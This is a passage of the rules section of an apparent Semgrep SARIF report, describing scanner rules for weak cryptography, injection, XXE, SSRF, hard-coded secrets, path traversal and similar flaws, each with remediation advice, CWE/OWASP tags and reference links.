Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: typescript.typescript.node.security.node-rsa-weak-key.node-rsa-weak-key"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"An insecure SSL context was detected. TLS versions 1.0, 1.1, and all SSL versions are considered weak encryption and are deprecated. Use SSLContext.getInstance(\"TLSv1.2\") for the best security."},"help":{"markdown":"An insecure SSL context was detected. TLS versions 1.0, 1.1, and all SSL versions are considered weak encryption and are deprecated. Use SSLContext.getInstance(\"TLSv1.2\") for the best security.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.audit.weak-ssl-context.weak-ssl-context)\n - [https://tools.ietf.org/html/rfc7568](https://tools.ietf.org/html/rfc7568)\n - [https://tools.ietf.org/id/draft-ietf-tls-oldversions-deprecate-02.html](https://tools.ietf.org/id/draft-ietf-tls-oldversions-deprecate-02.html)\n","text":"An insecure SSL context was detected. TLS versions 1.0, 1.1, and all SSL versions are considered weak encryption and are deprecated. Use SSLContext.getInstance(\"TLSv1.2\") for the best security."},"helpUri":"https://semgrep.dev/r/java.lang.security.audit.weak-ssl-context.weak-ssl-context","id":"java.lang.security.audit.weak-ssl-context.weak-ssl-context","name":"java.lang.security.audit.weak-ssl-context.weak-ssl-context","properties":{"precision":"very-high","tags":["CWE-326: Inadequate Encryption Strength","HIGH CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.audit.weak-ssl-context.weak-ssl-context"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. Starting from `ruamel.yaml` version 0.15.0 the default loader (`typ='rt'`) is a direct derivative of the safe loader. Before this version, use the optional argument `Loader` with value `SafeLoader` or `CSafeLoader`, or use the `safe_load` function."},"help":{"markdown":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. Starting from `ruamel.yaml` version 0.15.0 the default loader (`typ='rt'`) is a direct derivative of the safe loader. Before this version, use the optional argument `Loader` with value `SafeLoader` or `CSafeLoader`, or use the `safe_load` function.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.aws-lambda.deserialization.tainted-ruamel-aws-lambda.tainted-ruamel-aws-lambda)\n - [https://cwe.mitre.org/data/definitions/502.html](https://cwe.mitre.org/data/definitions/502.html)\n - [https://knowledge-base.secureflag.com/vulnerabilities/unsafe_deserialization/unsafe_deserialization_python.html](https://knowledge-base.secureflag.com/vulnerabilities/unsafe_deserialization/unsafe_deserialization_python.html)\n - [https://nvd.nist.gov/vuln/detail/CVE-2017-18342](https://nvd.nist.gov/vuln/detail/CVE-2017-18342)\n - [https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures](https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures)\n - [https://portswigger.net/web-security/deserialization](https://portswigger.net/web-security/deserialization)\n - [https://yaml.readthedocs.io/en/latest/api/](https://yaml.readthedocs.io/en/latest/api/)\n","text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. Starting from `ruamel.yaml` version 0.15.0 the default loader (`typ='rt'`) is a direct derivative of the safe loader. Before this version, use the optional argument `Loader` with value `SafeLoader` or `CSafeLoader`, or use the `safe_load` function."},"helpUri":"https://semgrep.dev/r/python.aws-lambda.deserialization.tainted-ruamel-aws-lambda.tainted-ruamel-aws-lambda","id":"python.aws-lambda.deserialization.tainted-ruamel-aws-lambda.tainted-ruamel-aws-lambda","name":"python.aws-lambda.deserialization.tainted-ruamel-aws-lambda.tainted-ruamel-aws-lambda","properties":{"precision":"very-high","tags":["CWE-502: Deserialization of Untrusted Data","HIGH CONFIDENCE","OWASP-A08:2017 - Insecure Deserialization","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.aws-lambda.deserialization.tainted-ruamel-aws-lambda.tainted-ruamel-aws-lambda"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Detected user input entering a method which executes a system command. This could result in a command injection vulnerability, which allows an attacker to inject an arbitrary system command onto the server. The attacker could download malware onto or steal data from the server. Instead, use ProcessBuilder, separating the command into individual arguments, like this: `new ProcessBuilder(\"ls\", \"-al\", targetDirectory)`. Further, make sure you hardcode or allowlist the actual command so that attackers can't run arbitrary commands."},"help":{"markdown":"Detected user input entering a method which executes a system command. This could result in a command injection vulnerability, which allows an attacker to inject an arbitrary system command onto the server. The attacker could download malware onto or steal data from the server. Instead, use ProcessBuilder, separating the command into individual arguments, like this: `new ProcessBuilder(\"ls\", \"-al\", targetDirectory)`. Further, make sure you hardcode or allowlist the actual command so that attackers can't run arbitrary commands.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.spring.security.injection.tainted-system-command.tainted-system-command)\n - [https://www.stackhawk.com/blog/command-injection-java/](https://www.stackhawk.com/blog/command-injection-java/)\n - [https://cheatsheetseries.owasp.org/cheatsheets/OS_Command_Injection_Defense_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/OS_Command_Injection_Defense_Cheat_Sheet.html)\n - [https://github.com/github/codeql/blob/main/java/ql/src/Security/CWE/CWE-078/ExecUnescaped.java](https://github.com/github/codeql/blob/main/java/ql/src/Security/CWE/CWE-078/ExecUnescaped.java)\n","text":"Detected user input entering a method which executes a system command. This could result in a command injection vulnerability, which allows an attacker to inject an arbitrary system command onto the server. The attacker could download malware onto or steal data from the server. Instead, use ProcessBuilder, separating the command into individual arguments, like this: `new ProcessBuilder(\"ls\", \"-al\", targetDirectory)`. Further, make sure you hardcode or allowlist the actual command so that attackers can't run arbitrary commands."},"helpUri":"https://semgrep.dev/r/java.spring.security.injection.tainted-system-command.tainted-system-command","id":"java.spring.security.injection.tainted-system-command.tainted-system-command","name":"java.spring.security.injection.tainted-system-command.tainted-system-command","properties":{"precision":"very-high","tags":["CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: java.spring.security.injection.tainted-system-command.tainted-system-command"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a `Billion Laughs Attack`. The XML parser $PARSER is not securely configured. The current configuration allows for XXE attacks. It is our recommendation to secure this parser against XXE attacks by configuring $PARSER with `$PARSER.setFeature(http://apache.org/xml/features/disallow-doctype-decl, true)`. Alternatively, the following configurations also provide protection against XXE attacks. `$PARSER.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, \"\")` `$PARSER.setFeature(\"http://xml.org/sax/features/external-general-entities\", false)` `$PARSER.setExpandEntities(false)` It is also possible to use one of the constructor parameters that will result in a more secure parser by default: `new SAXBuilder(XMLReaders.DTDVALIDATING)` or `new SAXBuilder(XMLReaders.XSDVALIDATING)`. The best defense against XXE is to have an XML parser that supports disabling DTDs. Limiting the use of external entities from the start can prevent the parser from being used to process untrusted XML files. Reducing dependencies on external resources is also a good practice for performance reasons. It is difficult to guarantee that even a trusted XML file on your server or during transmission has not been tampered with by a malicious third-party. For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)"},"help":{"markdown":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a `Billion Laughs Attack`. The XML parser $PARSER is not securely configured. The current configuration allows for XXE attacks. It is our recommendation to secure this parser against XXE attacks by configuring $PARSER with `$PARSER.setFeature(http://apache.org/xml/features/disallow-doctype-decl, true)`. Alternatively, the following configurations also provide protection against XXE attacks. `$PARSER.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, \"\")` `$PARSER.setFeature(\"http://xml.org/sax/features/external-general-entities\", false)` `$PARSER.setExpandEntities(false)` It is also possible to use one of the constructor parameters that will result in a more secure parser by default: `new SAXBuilder(XMLReaders.DTDVALIDATING)` or `new SAXBuilder(XMLReaders.XSDVALIDATING)`. The best defense against XXE is to have an XML parser that supports disabling DTDs. Limiting the use of external entities from the start can prevent the parser from being used to process untrusted XML files. Reducing dependencies on external resources is also a good practice for performance reasons. It is difficult to guarantee that even a trusted XML file on your server or during transmission has not been tampered with by a malicious third-party. For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/kotlin.xxe.saxbuilder-xxe.saxbuilder-xxe)\n - [https://blog.sonarsource.com/secure-xml-processor/](https://blog.sonarsource.com/secure-xml-processor/)\n - [https://blog.sonarsource.com/understanding-xxe-vulnerabilities/](https://blog.sonarsource.com/understanding-xxe-vulnerabilities/)\n - [https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html)\n - [https://cwe.mitre.org/data/definitions/776.html](https://cwe.mitre.org/data/definitions/776.html)\n - [https://docs.oracle.com/en/java/javase/13/security/java-api-xml-processing-jaxp-security-guide.html#GUID-D97A1F1D-8DDF-4D19-A7E5-99099F27346E](https://docs.oracle.com/en/java/javase/13/security/java-api-xml-processing-jaxp-security-guide.html#GUID-D97A1F1D-8DDF-4D19-A7E5-99099F27346E)\n - [https://github.com/returntocorp/java-xxe-research](https://github.com/returntocorp/java-xxe-research)\n - [https://owasp.org/Top10/A05_2021-Security_Misconfiguration](https://owasp.org/Top10/A05_2021-Security_Misconfiguration)\n - [https://rules.sonarsource.com/java/type/Vulnerability/RSPEC-2755](https://rules.sonarsource.com/java/type/Vulnerability/RSPEC-2755)\n - [https://semgrep.dev/blog/2022/xml-security-in-java](https://semgrep.dev/blog/2022/xml-security-in-java)\n - [https://semgrep.dev/docs/cheat-sheets/java-xxe/](https://semgrep.dev/docs/cheat-sheets/java-xxe/)\n","text":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a `Billion Laughs Attack`. The XML parser $PARSER is not securely configured. The current configuration allows for XXE attacks. It is our recommendation to secure this parser against XXE attacks by configuring $PARSER with `$PARSER.setFeature(http://apache.org/xml/features/disallow-doctype-decl, true)`. Alternatively, the following configurations also provide protection against XXE attacks. `$PARSER.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, \"\")` `$PARSER.setFeature(\"http://xml.org/sax/features/external-general-entities\", false)` `$PARSER.setExpandEntities(false)` It is also possible to use one of the constructor parameters that will result in a more secure parser by default: `new SAXBuilder(XMLReaders.DTDVALIDATING)` or `new SAXBuilder(XMLReaders.XSDVALIDATING)`. The best defense against XXE is to have an XML parser that supports disabling DTDs. Limiting the use of external entities from the start can prevent the parser from being used to process untrusted XML files. Reducing dependencies on external resources is also a good practice for performance reasons. It is difficult to guarantee that even a trusted XML file on your server or during transmission has not been tampered with by a malicious third-party. For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)"},"helpUri":"https://semgrep.dev/r/kotlin.xxe.saxbuilder-xxe.saxbuilder-xxe","id":"kotlin.xxe.saxbuilder-xxe.saxbuilder-xxe","name":"kotlin.xxe.saxbuilder-xxe.saxbuilder-xxe","properties":{"precision":"very-high","tags":["CWE-776: Improper Restriction of Recursive Entity References in DTDs ('XML Entity Expansion')","MEDIUM CONFIDENCE","OWASP-A04:2017 - XML External Entities (XXE)","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: kotlin.xxe.saxbuilder-xxe.saxbuilder-xxe"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"File name based on user input risks server-side request forgery."},"help":{"markdown":"File name based on user input risks server-side request forgery.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/php.lang.security.injection.tainted-filename.tainted-filename)\n - [https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29](https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29)\n","text":"File name based on user input risks server-side request forgery."},"helpUri":"https://semgrep.dev/r/php.lang.security.injection.tainted-filename.tainted-filename","id":"php.lang.security.injection.tainted-filename.tainted-filename","name":"php.lang.security.injection.tainted-filename.tainted-filename","properties":{"precision":"very-high","tags":["CWE-918: Server-Side Request Forgery (SSRF)","MEDIUM CONFIDENCE","OWASP-A10:2021 - Server-Side Request Forgery (SSRF)","security"]},"shortDescription":{"text":"Semgrep Finding: php.lang.security.injection.tainted-filename.tainted-filename"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/swift.cryptoswift.rabbit-hardcoded-secret.rabbit-hardcoded-secret)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"helpUri":"https://semgrep.dev/r/swift.cryptoswift.rabbit-hardcoded-secret.rabbit-hardcoded-secret","id":"swift.cryptoswift.rabbit-hardcoded-secret.rabbit-hardcoded-secret","name":"swift.cryptoswift.rabbit-hardcoded-secret.rabbit-hardcoded-secret","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: swift.cryptoswift.rabbit-hardcoded-secret.rabbit-hardcoded-secret"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Access-Control-Allow-Origin response header is set to \"*\". This will disable CORS Same Origin Policy restrictions."},"help":{"markdown":"Access-Control-Allow-Origin response header is set to \"*\". This will disable CORS Same Origin Policy restrictions.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/typescript.nestjs.security.audit.nestjs-header-cors-any.nestjs-header-cors-any)\n - [https://owasp.org/Top10/A04_2021-Insecure_Design](https://owasp.org/Top10/A04_2021-Insecure_Design)\n","text":"Access-Control-Allow-Origin response header is set to \"*\". This will disable CORS Same Origin Policy restrictions."},"helpUri":"https://semgrep.dev/r/typescript.nestjs.security.audit.nestjs-header-cors-any.nestjs-header-cors-any","id":"typescript.nestjs.security.audit.nestjs-header-cors-any.nestjs-header-cors-any","name":"typescript.nestjs.security.audit.nestjs-header-cors-any.nestjs-header-cors-any","properties":{"precision":"very-high","tags":["CWE-183: Permissive List of Allowed Inputs","LOW CONFIDENCE","OWASP-A04:2021 - Insecure Design","security"]},"shortDescription":{"text":"Semgrep Finding: typescript.nestjs.security.audit.nestjs-header-cors-any.nestjs-header-cors-any"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.jedis.secrets.jedis-jedisclientconfig-hardcoded-password.jedis-jedisclientconfig-hardcoded-password)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"helpUri":"https://semgrep.dev/r/java.jedis.secrets.jedis-jedisclientconfig-hardcoded-password.jedis-jedisclientconfig-hardcoded-password","id":"java.jedis.secrets.jedis-jedisclientconfig-hardcoded-password.jedis-jedisclientconfig-hardcoded-password","name":"java.jedis.secrets.jedis-jedisclientconfig-hardcoded-password.jedis-jedisclientconfig-hardcoded-password","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: java.jedis.secrets.jedis-jedisclientconfig-hardcoded-password.jedis-jedisclientconfig-hardcoded-password"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions."},"help":{"markdown":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/rust.hyper.sql.tokio-postgres-taint.tokio-postgres-taint)\n - [https://docs.rs/tokio-postgres/latest/tokio_postgres/](https://docs.rs/tokio-postgres/latest/tokio_postgres/)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions."},"helpUri":"https://semgrep.dev/r/rust.hyper.sql.tokio-postgres-taint.tokio-postgres-taint","id":"rust.hyper.sql.tokio-postgres-taint.tokio-postgres-taint","name":"rust.hyper.sql.tokio-postgres-taint.tokio-postgres-taint","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: rust.hyper.sql.tokio-postgres-taint.tokio-postgres-taint"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected file permissions that are overly permissive (read, write, and execute). It is generally a bad practices to set overly permissive file permission such as read+write+exec for all users. If the file affected is a configuration, a binary, a script or sensitive data, it can lead to privilege escalation or information leakage. Instead, follow the principle of least privilege and give users only the permissions they need."},"help":{"markdown":"Detected file permissions that are overly permissive (read, write, and execute). It is generally a bad practices to set overly permissive file permission such as read+write+exec for all users. If the file affected is a configuration, a binary, a script or sensitive data, it can lead to privilege escalation or information leakage. Instead, follow the principle of least privilege and give users only the permissions they need.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.audit.overly-permissive-file-permission.overly-permissive-file-permission)\n - [https://owasp.org/Top10/A01_2021-Broken_Access_Control](https://owasp.org/Top10/A01_2021-Broken_Access_Control)\n","text":"Detected file permissions that are overly permissive (read, write, and execute). It is generally a bad practices to set overly permissive file permission such as read+write+exec for all users. If the file affected is a configuration, a binary, a script or sensitive data, it can lead to privilege escalation or information leakage. Instead, follow the principle of least privilege and give users only the permissions they need."},"helpUri":"https://semgrep.dev/r/java.lang.security.audit.overly-permissive-file-permission.overly-permissive-file-permission","id":"java.lang.security.audit.overly-permissive-file-permission.overly-permissive-file-permission","name":"java.lang.security.audit.overly-permissive-file-permission.overly-permissive-file-permission","properties":{"precision":"very-high","tags":["CWE-276: Incorrect Default Permissions","LOW CONFIDENCE","OWASP-A01:2021 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.audit.overly-permissive-file-permission.overly-permissive-file-permission"}},{"defaultConfiguration":{"level":"note"},"fullDescription":{"text":"The libxml2 parser is configured to process entities. Without other options such as processing DTDs or accessing remote entities from the network, it should not pose a risk except for memory exhaustion."},"help":{"markdown":"The libxml2 parser is configured to process entities. Without other options such as processing DTDs or accessing remote entities from the network, it should not pose a risk except for memory exhaustion.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/cpp.libxml2.security.libxml2-expand-local-entities.libxml2-expand-local-entities)\n - [https://owasp.org/Top10/A05_2021-Security_Misconfiguration](https://owasp.org/Top10/A05_2021-Security_Misconfiguration)\n - [https://wiki.sei.cmu.edu/confluence/display/c/STR02-C.+Sanitize+data+passed+to+complex+subsystems](https://wiki.sei.cmu.edu/confluence/display/c/STR02-C.+Sanitize+data+passed+to+complex+subsystems)\n","text":"The libxml2 parser is configured to process entities. Without other options such as processing DTDs or accessing remote entities from the network, it should not pose a risk except for memory exhaustion."},"helpUri":"https://semgrep.dev/r/cpp.libxml2.security.libxml2-expand-local-entities.libxml2-expand-local-entities","id":"cpp.libxml2.security.libxml2-expand-local-entities.libxml2-expand-local-entities","name":"cpp.libxml2.security.libxml2-expand-local-entities.libxml2-expand-local-entities","properties":{"precision":"very-high","tags":["CWE-611: Improper Restriction of XML External Entity Reference","MEDIUM CONFIDENCE","OWASP-A04:2017 - XML External Entities (XXE)","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: cpp.libxml2.security.libxml2-expand-local-entities.libxml2-expand-local-entities"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. To prevent this vulnerability, validate and sanitize any input that is used to create references to file paths. Also, enforce strict file access controls. For example, choose privileges allowing public-facing applications to access only the required files."},"help":{"markdown":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. To prevent this vulnerability, validate and sanitize any input that is used to create references to file paths. Also, enforce strict file access controls. For example, choose privileges allowing public-facing applications to access only the required files.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.lang.file.tainted-path-traversal-stdlib.tainted-path-traversal-stdlib)\n - [https://owasp.org/Top10/A01_2021-Broken_Access_Control](https://owasp.org/Top10/A01_2021-Broken_Access_Control)\n - [https://owasp.org/www-community/attacks/Path_Traversal](https://owasp.org/www-community/attacks/Path_Traversal)\n - [https://portswigger.net/web-security/file-path-traversal](https://portswigger.net/web-security/file-path-traversal)\n","text":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. To prevent this vulnerability, validate and sanitize any input that is used to create references to file paths. Also, enforce strict file access controls. For example, choose privileges allowing public-facing applications to access only the required files."},"helpUri":"https://semgrep.dev/r/python.lang.file.tainted-path-traversal-stdlib.tainted-path-traversal-stdlib","id":"python.lang.file.tainted-path-traversal-stdlib.tainted-path-traversal-stdlib","name":"python.lang.file.tainted-path-traversal-stdlib.tainted-path-traversal-stdlib","properties":{"precision":"very-high","tags":["CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')","HIGH CONFIDENCE","OWASP-A01:2021 - Broken Access Control","OWASP-A05:2017 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: python.lang.file.tainted-path-traversal-stdlib.tainted-path-traversal-stdlib"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. Create parameterized queries in pgx by using positional parameters (`$1`, `$2`, ...) and adding the values as additional arguments to the function call. It is also possible to create prepared statements through the `Prepare` function. This function uses the same placeholders for bound parameters."},"help":{"markdown":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. Create parameterized queries in pgx by using positional parameters (`$1`, `$2`, ...) and adding the values as additional arguments to the function call. It is also possible to create prepared statements through the `Prepare` function. This function uses the same placeholders for bound parameters.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/go.grpc.sql.grpc-pgx-sqli-taint-med-conf.grpc-pgx-sqli-taint-med-conf)\n - [https://github.com/jackc/pgx](https://github.com/jackc/pgx)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n - [https://pkg.go.dev/github.com/jackc/pgx/v4#hdr-Connection_Pool](https://pkg.go.dev/github.com/jackc/pgx/v4#hdr-Connection_Pool)\n","text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. Create parameterized queries in pgx by using positional parameters (`$1`, `$2`, ...) and adding the values as additional arguments to the function call. It is also possible to create prepared statements through the `Prepare` function. This function uses the same placeholders for bound parameters."},"helpUri":"https://semgrep.dev/r/go.grpc.sql.grpc-pgx-sqli-taint-med-conf.grpc-pgx-sqli-taint-med-conf","id":"go.grpc.sql.grpc-pgx-sqli-taint-med-conf.grpc-pgx-sqli-taint-med-conf","name":"go.grpc.sql.grpc-pgx-sqli-taint-med-conf.grpc-pgx-sqli-taint-med-conf","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","MEDIUM CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: go.grpc.sql.grpc-pgx-sqli-taint-med-conf.grpc-pgx-sqli-taint-med-conf"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"If possible, it is better to rely on automatic pinning in PyTorch to avoid undefined behavior and for efficiency"},"help":{"markdown":"If possible, it is better to rely on automatic pinning in PyTorch to avoid undefined behavior and for efficiency\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/trailofbits.python.automatic-memory-pinning.automatic-memory-pinning)\n - [https://pytorch.org/docs/stable/data.html#memory-pinning](https://pytorch.org/docs/stable/data.html#memory-pinning)\n","text":"If possible, it is better to rely on automatic pinning in PyTorch to avoid undefined behavior and for efficiency"},"helpUri":"https://semgrep.dev/r/trailofbits.python.automatic-memory-pinning.automatic-memory-pinning","id":"trailofbits.python.automatic-memory-pinning.automatic-memory-pinning","name":"trailofbits.python.automatic-memory-pinning.automatic-memory-pinning","properties":{"precision":"very-high","tags":["CWE-676: Use of Potentially Dangerous Function","HIGH CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: trailofbits.python.automatic-memory-pinning.automatic-memory-pinning"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Iteration over a possibly empty map `$C`. This is likely a bug or redundant code"},"help":{"markdown":"Iteration over a possibly empty map `$C`. This is likely a bug or redundant code\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/trailofbits.go.iterate-over-empty-map.iterate-over-empty-map)\n - [https://blog.trailofbits.com/2019/11/07/attacking-go-vr-ttps/](https://blog.trailofbits.com/2019/11/07/attacking-go-vr-ttps/)\n","text":"Iteration over a possibly empty map `$C`. This is likely a bug or redundant 